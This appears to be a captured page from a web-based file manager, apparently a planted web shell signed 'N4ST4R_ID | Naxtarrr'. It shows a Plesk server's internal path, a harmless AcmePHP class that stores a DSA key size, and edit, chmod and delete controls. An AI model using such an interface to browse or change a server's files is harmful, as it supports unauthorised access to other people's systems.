Submit
Path:
~
/
/
usr
/
local
/
psa
/
admin
/
plib
/
modules
/
sslit
/
vendor
/
acmephp
/
ssl
/
Generator
/
DsaKey
/
File Content:
DsaKeyOption.php
<?php /* * This file is part of the Acme PHP project. * * (c) Titouan Galopin <galopintitouan@gmail.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace PleskSslIt\AcmePhp\Ssl\Generator\DsaKey; use PleskSslIt\AcmePhp\Ssl\Generator\KeyOption; use PleskSslIt\Webmozart\Assert\Assert; class DsaKeyOption implements KeyOption { /** @var int */ private $bits; public function __construct($bits = 2048) { Assert::integer($bits); $this->bits = $bits; } /** * @return int */ public function getBits() { return $this->bits; } }
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
DsaKeyGenerator.php
1212 bytes
0644
DsaKeyOption.php
690 bytes
0644
N4ST4R_ID | Naxtarrr